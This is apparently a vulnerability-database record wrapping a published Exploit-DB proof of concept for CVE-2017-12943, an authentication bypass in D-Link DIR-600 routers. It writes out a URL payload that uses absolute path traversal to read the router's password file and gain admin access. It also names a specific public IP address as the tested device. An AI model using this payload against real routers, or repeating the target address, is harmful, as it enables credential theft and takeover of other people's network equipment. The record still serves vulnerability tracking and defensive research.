ID

VAR-E-201708-0093


CVE

cve_id:CVE-2017-12943

Trust: 1.0

sources: EXPLOIT-DB: 42581

EDB ID

42581


TITLE

D-Link DIR-600 - Authentication Bypass - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 42581

DESCRIPTION

D-Link DIR-600 - Authentication Bypass. CVE-2017-12943. webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 42581

AFFECTED PRODUCTS

vendor:d link model:dir-600 scope: - version: -

Trust: 2.2

sources: EXPLOIT-DB: 42581 // EDBNET: 93965 // EDBNET: 93984

EXPLOIT

# Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack)
# CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943
# Date: 29-08-2017
# Exploit Author: Jithin D Kurup
# Contact : https://in.linkedin.com/in/jithin-d-kurup-77b616142
# Vendor : www.dlink.com
# Version: Hardware version: B1
#          Firmware version: 2.01
# Tested on: All Platforms


1) Description

After successfully connecting to a D-Link DIR-600
router (firmware version: 2.01), any user can easily bypass the router's
admin panel just by adding a simple payload to the URL.

D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to
read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack,
as demonstrated by discovering the admin password.

It's more dangerous when your router has a public IP with remote login
enabled.


IN MY CASE,
Tested Router IP : http://190.164.170.249



Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ

2) Proof of Concept

Step 1: Go to
Router Login Page : http://190.164.170.249:8080

Step 2:
Add the payload to URL.

Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd


Bingooo You got admin Access on router.
Now you can download/upload settings, change settings, etc.




---------------Greetz----------------
+++++++++++ www.0seccon.com ++++++++++++
Saran,Dhani,Gem,Vignesh,Hemanth,Sudin,Vijith

Trust: 1.0

sources: EXPLOIT-DB: 42581

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 42581

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 42581

TYPE

Authentication Bypass

Trust: 1.6

sources: EXPLOIT-DB: 42581 // EDBNET: 93965

CREDITS

Jithin D Kurup

Trust: 0.6

sources: EXPLOIT-DB: 42581

EXTERNAL IDS

db:NVD id:CVE-2017-12943

Trust: 2.2

db:EXPLOIT-DB id:42581

Trust: 1.6

db:EDBNET id:93965

Trust: 0.6

db:0DAYTODAY id:28397

Trust: 0.6

db:EDBNET id:93984

Trust: 0.6

sources: EXPLOIT-DB: 42581 // EDBNET: 93965 // EDBNET: 93984

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2017-12943

Trust: 1.0

url:https://www.exploit-db.com/exploits/42581/

Trust: 0.6

url:https://0day.today/exploits/28397

Trust: 0.6

sources: EXPLOIT-DB: 42581 // EDBNET: 93965 // EDBNET: 93984

SOURCES

db:EXPLOIT-DB id:42581
db:EDBNET id:93965
db:EDBNET id:93984

LAST UPDATE DATE

2022-07-27T09:49:22.303000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DB id:42581 date:2017-08-29T00:00:00
db:EDBNET id:93965 date:2017-08-29T00:00:00
db:EDBNET id:93984 date:2017-08-30T00:00:00